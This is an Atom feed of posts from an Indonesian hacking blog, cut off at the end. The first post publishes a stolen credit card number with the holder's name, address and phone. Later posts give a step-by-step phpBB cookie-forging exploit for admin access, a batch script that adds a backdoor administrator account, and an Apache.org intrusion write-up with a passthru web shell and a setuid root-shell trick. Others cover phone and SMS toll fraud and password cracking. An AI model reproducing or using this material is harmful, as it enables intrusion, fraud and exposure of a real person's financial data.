<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1331045226915696546</id><updated>2012-01-12T11:43:35.163+07:00</updated><title type='text'>Cara - Cara dan Info Hacking</title><subtitle type='html'>Kumpulan Artikel - Artikel Seputar Hacking di Indonesia</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>32</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-5923364874705297332</id><published>2007-03-31T04:44:00.000+07:00</published><updated>2007-03-31T04:46:56.079+07:00</updated><title type='text'>No. Kartu Kredit</title><content type='html'>Ini adalah salah satu contoh nomor kartu kredit yang saya (blog maker) dapat ambil dari salah satu database situs toko online.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;BetterHealthChoices.com&lt;br /&gt;(888)890-4744&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;  &lt;br /&gt;Order NO: CC-1211512&lt;br /&gt;Date: 6/7/2003 12:47:38 PM&lt;br /&gt;&lt;br /&gt;stipel711@1st.net &lt;br /&gt;&lt;br /&gt;Shipping Info:&lt;br /&gt;Susan Tippel&lt;br /&gt;59308 Frankfort Road &lt;br /&gt;Salesville, OH  43778&lt;br /&gt;740 679-2328&lt;br /&gt;&lt;br /&gt;Billing Info:&lt;br /&gt;Susan Tippel&lt;br /&gt;59308 Frankfort Road &lt;br /&gt;Salesville, OH  43778&lt;br /&gt;740 679-2328&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;4418 5391 2112 2878  &lt;br /&gt;07/04&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-5923364874705297332?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/5923364874705297332/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=5923364874705297332' title='77 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5923364874705297332'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5923364874705297332'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/no-kartu-kredit.html' title='No. Kartu Kredit'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>77</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-2697261449533127632</id><published>2007-03-31T04:43:00.002+07:00</published><updated>2007-03-31T04:44:34.670+07:00</updated><title type='text'>Defacing</title><content type='html'>Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20 &lt;br /&gt;1. Download browser Mozilla FireFox &lt;br /&gt;&lt;br /&gt;2. Download pluginnya yg bernama LiveHTTPHeader &lt;br /&gt;download di http://livehttpheaders.mozdev.org/installation.html &lt;br /&gt;cari yg paling baru  &lt;br /&gt;&lt;br /&gt;3. selanjutnya cari target dengan Uncle Google dgn syntax : &lt;br /&gt;phpBB site:[terserah apa aja] &lt;br /&gt;&lt;br /&gt;4. setelah itu buka plugin yg kita download tadi di Tools -&gt; LiveHTTPHeader &lt;br /&gt;&lt;br /&gt;5. Ingat, isi LiveHTTPHeader harus kosong &lt;br /&gt;&lt;br /&gt;6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target &lt;br /&gt;&lt;br /&gt;7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay.. &lt;br /&gt;&lt;br /&gt;8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay... &lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b &lt;br /&gt;&lt;br /&gt;9. Hapus bagian yg belakang setelah tanda semi colon ( &lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b &lt;br /&gt;&lt;br /&gt;\_______________hapus bagian ini_________________/ &lt;br /&gt;&lt;br /&gt;jadinya akan seperti ini : &lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D &lt;br /&gt;&lt;br /&gt;10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi &lt;br /&gt;&lt;br /&gt;11. selanjutnya perhatikan langkah di bawah ini: &lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D &lt;br /&gt;\________hapus bagian ini dan di ganti dengan: &lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";} &lt;br /&gt;&lt;br /&gt;12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi. &lt;br /&gt;&lt;br /&gt;13. perhatikan lagi langkah ini: &lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";} &lt;br /&gt;\___________________________bagian ini jg digantilagi_______________________________/ &lt;br /&gt;&lt;br /&gt;menjadi seperti ini: &lt;br /&gt;&lt;br /&gt;Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D &lt;br /&gt;&lt;br /&gt;14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi. &lt;br /&gt;&lt;br /&gt;15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin. &lt;br /&gt;Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-2697261449533127632?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/2697261449533127632/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=2697261449533127632' title='18 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/2697261449533127632'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/2697261449533127632'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/defacing.html' title='Defacing'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>18</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-8296568683912434961</id><published>2007-03-31T04:43:00.001+07:00</published><updated>2007-03-31T04:43:36.789+07:00</updated><title type='text'>Echo Backdoor</title><content type='html'>rem *echobackd00r.bat&lt;br /&gt;rem *Maret 2004 - backd00r untuk XP &amp;&amp; 2000&lt;br /&gt;rem *dibuat untuk mempermudah menciptakan account admin&lt;br /&gt;rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2&lt;br /&gt;rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;rem *MULAI.&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;PROMPT $P$G&lt;br /&gt;cls&lt;br /&gt;Color 87&lt;br /&gt;GOto iklan&lt;br /&gt;&lt;br /&gt;:setting&lt;br /&gt;&lt;br /&gt; rem *ganti USER dan PASS&lt;br /&gt;&lt;br /&gt; set USER="backdoor"&lt;br /&gt; set PASS="password"&lt;br /&gt;&lt;br /&gt; if %USER%=="backdoor" Goto gagal else GOto proses&lt;br /&gt;&lt;br /&gt;:proses&lt;br /&gt;&lt;br /&gt; rem *masuk ke perintah tuk nambahin user + passwordnya&lt;br /&gt;&lt;br /&gt; net user %USER% %PASS% /add&lt;br /&gt; net localgroup Administrators %USER% /add&lt;br /&gt; net localgroup Users %USER% /delete&lt;br /&gt;&lt;br /&gt; cls&lt;br /&gt; echo.&lt;br /&gt; echo   Account %USER% dengan password %PASS% telah berhasil di buat!&lt;br /&gt; color 70&lt;br /&gt; &lt;br /&gt;&lt;br /&gt; EXIT&lt;br /&gt;&lt;br /&gt;:iklan&lt;br /&gt;&lt;br /&gt; rem * just a banner from me :) , bisa di hilangkan :p&lt;br /&gt; &lt;br /&gt; echo.&lt;br /&gt; echo  ###############################################################&lt;br /&gt; echo  #                                                             #&lt;br /&gt; echo  #                         Echobackd00r                        #&lt;br /&gt; echo  #          created &amp;&amp; tested by y3dips with XP OS             #&lt;br /&gt; echo  # greetz to :the_day for idea, moby, z3r0byt3,comex, *PUJI    #&lt;br /&gt; echo  #                   note: ubah USER dan PASS                  #&lt;br /&gt; echo  #                                                             #&lt;br /&gt; echo  ###############################################################&lt;br /&gt; echo.&lt;br /&gt; echo                        tekan ENTER !!!                         &lt;br /&gt; pause&gt;nul&lt;br /&gt;&lt;br /&gt;Goto setting&lt;br /&gt;&lt;br /&gt;:gagal&lt;br /&gt;&lt;br /&gt; echo.&lt;br /&gt; echo       edit file echobackd00r.bat dan ubah USER dan PASSnya &lt;br /&gt; echo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;rem *SELESAI.&lt;br /&gt;rem *created by y3dips : maret 2004 : http://echo.or.id&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-8296568683912434961?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/8296568683912434961/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=8296568683912434961' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8296568683912434961'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8296568683912434961'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/echo-backdoor.html' title='Echo Backdoor'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-5114053881933472701</id><published>2007-03-31T04:40:00.001+07:00</published><updated>2007-03-31T04:40:33.686+07:00</updated><title type='text'>How To Deface APACHE</title><content type='html'>/*&lt;br /&gt; * Before you start reading&lt;br /&gt; */&lt;br /&gt;This paper does _not_ uncover any new vulnerabilities. It points out common&lt;br /&gt;(and slightly less common) configuration errors, which even the people at&lt;br /&gt;apache.org made. This is a general warning. Learn from it. Fix your systems,&lt;br /&gt;so we won't have to :)&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * introduction&lt;br /&gt; */&lt;br /&gt;This paper describes how, over the course of a week, we succeeded in&lt;br /&gt;getting root access to the machine running www.apache.org, and changed&lt;br /&gt;the main page to show a 'Powered by Microsoft BackOffice' logo instead&lt;br /&gt;of the default 'Powered by Apache' logo (the feather). No other changes&lt;br /&gt;were made, except to prevent other (possibly malicious) people getting in.&lt;br /&gt;&lt;br /&gt;Note that the problems described in this paper are not apache-related,&lt;br /&gt;these were all config errors (one of 'm straight from BugZilla's README,&lt;br /&gt;but the README had enough warnings so I don't blame the BugZilla developers).&lt;br /&gt;People running apache httpd do not need to start worrying because of&lt;br /&gt;anything uncovered herein.&lt;br /&gt;&lt;br /&gt;We hacked www.apache.org because there are a lot of servers running apache&lt;br /&gt;software and if www.apache.org got compromised, somebody could backdoor&lt;br /&gt;the apache server source and end up having lots of owned boxes.&lt;br /&gt;&lt;br /&gt;We just couldn't allow this to happen, we secured the main ftproot==wwwroot&lt;br /&gt;thing. While having owned root we just couldnt stand the urge to put that&lt;br /&gt;small logo on it.&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * ftproot == wwwroot&lt;br /&gt; * o+w dirs&lt;br /&gt; */&lt;br /&gt;While searching for the laters apache httpserver to diff it the with&lt;br /&gt;previous version and read that diff file for any options of new buffer&lt;br /&gt;overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of&lt;br /&gt;the http://www.apache.org on that ftp including world writable directories.&lt;br /&gt;&lt;br /&gt;So we wrote a little wuh.php3 including &lt;br /&gt;&lt;?&lt;br /&gt;        passthru($cmd);&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;and uploaded that to one of the world writable directories.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * Our commands executed&lt;br /&gt; */&lt;br /&gt;Unsurprisingly, 'id' got executed when called like&lt;br /&gt;&lt;br /&gt;      http://www.apache.org/thatdir/wuh.php3?cmd=id&lt;br /&gt;&lt;br /&gt;Next was to upload some bindshell and compile it like calling&lt;br /&gt;http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then&lt;br /&gt;executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * The shell&lt;br /&gt; */&lt;br /&gt;Ofcourse we used a bindshell that first requires ppl to authenticate with&lt;br /&gt;a hardcoded password (:&lt;br /&gt;&lt;br /&gt;Now we telnet to port 65533 where we binded that shell and we have local&lt;br /&gt;nobody access, because cgi is running as user nobody. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * The apache.org box&lt;br /&gt; */&lt;br /&gt;What did we find on apache.org box:&lt;br /&gt;        -o=rx /root&lt;br /&gt;        -o=rx homedirs&lt;br /&gt;        &lt;br /&gt;apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer&lt;br /&gt;overflow or some lame exploit, goal was to reach root with only&lt;br /&gt;configuration faults. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * Mysql&lt;br /&gt; */&lt;br /&gt;After a long search we found out that mysql was&lt;br /&gt;running as user root and was reachable locally. Because apache.org was&lt;br /&gt;running bugzilla which requires a mysql account and has it&lt;br /&gt;username/password plaintext in the bugzilla source it was easy to&lt;br /&gt;get a username/passwd for the mysql database.&lt;br /&gt;&lt;br /&gt;We downloaded nportredird and have it set up to accept connections on&lt;br /&gt;port 23306 from our ips and redir them to localhost port 3306 so we could&lt;br /&gt;use our own mysql clients.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * Full mysql access&lt;br /&gt; * use it to create files&lt;br /&gt; */&lt;br /&gt;Having gained access to port 3306 coming from localhost, using the login&lt;br /&gt;'bugs' (which had full access [as in "all Y's"]), our privs where&lt;br /&gt;elevated substantially. This was mostly due to sloppy reading of the BugZilla&lt;br /&gt;README which _does_ show a quick way to set things up (with all Y's) but&lt;br /&gt;also has lots of security warnings, including "don't run mysqld as root".&lt;br /&gt;&lt;br /&gt;Using 'SELECT ... INTO OUTFILE;' we were now able to create files&lt;br /&gt;anywhere, as root. These files were mode 666, and we could not overwrite&lt;br /&gt;anything. Still, this seemed useful.&lt;br /&gt;&lt;br /&gt;But what do you do with this ability? No use writing .rhosts files - no&lt;br /&gt;sane rshd will accept a world-writable .rhosts file. Besides, rshd&lt;br /&gt;wasn't running on this box.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * our /root/.tcshrc&lt;br /&gt; */&lt;br /&gt;Therefore, we decided to perform a trojan-like trick. We used database&lt;br /&gt;'test' and created a one-column table with a 80char textfield. A couple&lt;br /&gt;of inserts and one select later, we had ourselves a /root/.tcshrc with&lt;br /&gt;contents similar to:&lt;br /&gt;      #!/bin/sh&lt;br /&gt;      cp /bin/sh /tmp/.rootsh&lt;br /&gt;      chmod 4755 /tmp/.rootsh&lt;br /&gt;      rm -f /root/.tcshrc&lt;br /&gt;&lt;br /&gt;      &lt;br /&gt;/*&lt;br /&gt; * ROOT!!&lt;br /&gt; */&lt;br /&gt;Quite trivial. Now the wait was for somebody to su -. Luckily, with 9&lt;br /&gt;people legally having root, this didn't take long. The rest is trivial&lt;br /&gt;too - being root the deface was quickly done, but not until after a&lt;br /&gt;short report listing the vulnerabilities and quick fixes was build.&lt;br /&gt;Shortly after the deface, we sent this report to one of the admins.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * Fix that ftproot==wwwroot&lt;br /&gt; */&lt;br /&gt;Another thing we did before the deface, was creating a file 'ftproot' in&lt;br /&gt;the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'&lt;br /&gt;and changing the ftproot to this new 'ftproot' dir, yielding the&lt;br /&gt;world-writable dirs unexploitable but allowing ftp URLs to continue&lt;br /&gt;working.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * What could have been compromised?&lt;br /&gt; */&lt;br /&gt;Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we&lt;br /&gt;wanted to, we could have done the same thing to Apache. Edit the source&lt;br /&gt;and have people download trojaned versions. Scary, eh?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * In short:&lt;br /&gt; */&lt;br /&gt;- ftproot==webroot, worldwritable  dirs allowing us to upload and execute&lt;br /&gt;  php3 scripts&lt;br /&gt;- mysqld running as root, with a FFULL RIGHTS login without a password.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; * Compliments for the Apache admin team&lt;br /&gt; */&lt;br /&gt;We would like to compliment the Apache admin team on their swift&lt;br /&gt;response when they found out about the deface, and also on their&lt;br /&gt;approach, even calling us 'white hats' (we were at the most 'grey hats'&lt;br /&gt;here, if you ask us).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-5114053881933472701?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/5114053881933472701/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=5114053881933472701' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5114053881933472701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/5114053881933472701'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/how-to-deface-apache.html' title='How To Deface APACHE'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-7088224713848648248</id><published>2007-03-31T04:33:00.000+07:00</published><updated>2007-03-31T04:34:12.524+07:00</updated><title type='text'>BUG SMS Satelindo</title><content type='html'>Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon yang sangat merobek kantong. &lt;br /&gt;&lt;br /&gt;GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain. &lt;br /&gt;&lt;br /&gt;oke sampe disini preambule kita akhiri.&lt;br /&gt;&lt;br /&gt;Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil. &lt;br /&gt;&lt;br /&gt;Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis. &lt;br /&gt;&lt;br /&gt;cara sebagai berikut:&lt;br /&gt;&lt;br /&gt;1. ketik SMS&lt;br /&gt;2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang) &lt;br /&gt;(yang saya dapatkan yaitu buug mentari versi 6163 &lt;- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)&lt;br /&gt;3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)&lt;br /&gt;4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.&lt;br /&gt;4. dapat kita liat bahwa sms kita terkirim.&lt;br /&gt;5. finish&lt;br /&gt;&lt;br /&gt;Dari sana kita bisa lakukan dengan sepuas hati.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-7088224713848648248?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/7088224713848648248/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=7088224713848648248' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7088224713848648248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7088224713848648248'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/bug-sms-satelindo.html' title='BUG SMS Satelindo'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-8725979028103773227</id><published>2007-03-31T04:32:00.001+07:00</published><updated>2007-03-31T04:32:53.374+07:00</updated><title type='text'>Tip n Trik Telepon Gratis</title><content type='html'>I. Trik telphon gratis Lokal (dalam kota)&lt;br /&gt;&lt;br /&gt;Fasilitas dan cara yang digunakan:&lt;br /&gt;1. Telphone umum koin yang masih hidup&lt;br /&gt;2. Pencet angka 1551 &lt;--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"&lt;br /&gt;3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)&lt;br /&gt;4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.&lt;br /&gt;&lt;br /&gt;Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :&lt;br /&gt;1. TERLALU BANYAK NOMOR YANG KEMBAR&lt;br /&gt;2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll&lt;br /&gt;3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG&lt;br /&gt;4. TELKOM SEDANG KENA TROUBLE :))&lt;br /&gt;&lt;br /&gt;II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)&lt;br /&gt;&lt;br /&gt;Fasilitas dan cara yang digunakan:&lt;br /&gt;1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)&lt;br /&gt;2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota) &lt;br /&gt;3. Bicaralah sepuas hati dan sebengkak bibir anda&lt;br /&gt;4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:&lt;br /&gt;&lt;br /&gt;TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA&lt;br /&gt;misal: tujuan 021888555000 -&gt; bila telah selesai ketikan 021888555000 lagi &lt;br /&gt;JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL&lt;br /&gt;&lt;br /&gt;TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR&lt;br /&gt;misal: tujuan 021888555000 -&gt; bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)&lt;br /&gt;JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain"  =))&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-8725979028103773227?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/8725979028103773227/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=8725979028103773227' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8725979028103773227'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8725979028103773227'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/tip-n-trik-telepon-gratis.html' title='Tip n Trik Telepon Gratis'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-979055047014962727</id><published>2007-03-31T04:30:00.000+07:00</published><updated>2007-03-31T04:32:02.120+07:00</updated><title type='text'>Cara Cepat Bongkar Password</title><content type='html'>Ada cara cepat menerobos password windows ( termasuk jaringan windows ) saat anda lupa yakni menngunakan @stake LC4 (dulunya bernama L0pht Crack). &lt;br /&gt; LC4 sanggup melawan mesin windows anda dengan sebuah kombinasi dari kamus dan serangan brutal orang2 usil.LC4 bisa mengcrack hampir semua password dalam hitungan detik saja.bahkan pada password yang terdiri dari angka dan karakter2 panjang.&lt;br /&gt; Seperti diketahui Password windows Nt,2000,dan juga XP disimpan menggunakan sandi (encrypt) hash marks.LC4 sanggup membongkar hash marks tersebut dengan proses kerja ratusan password per menitnya.selanjtnya,password yang tepat akan dikirim dan ditampilkan ke layar monitor&lt;br /&gt; Dalam sebuah perusahaan,LC4 bisa digunakan untuk mengakses PC karyawan.ia bisa digunakan untuk mengakses komputer dari user-user yang lupa dengan password-nya.maksudnya,System Administrators jaringan bisa mencari password yang lemah dalam beberapa menit.bahkan juga,sys admins bisa merubah password tersebut agar lebih aman &lt;br /&gt; Kejelekan program pembongkar password ini,seseorang yang usil bisa menggunakan LC4 ini untuk mencium (Mengawasi) password2 dari user sebuah jaringan.bahkan,seorang hacker bisa memasang aplikasi primary domain controller dan menjegal ratusan password berharga hanya dalam hitungan menit.&lt;br /&gt; Info dan Download Program LC4beserta versi evaluasi ini bisa diambil http://www.atstake.com/research/lc/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-979055047014962727?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' 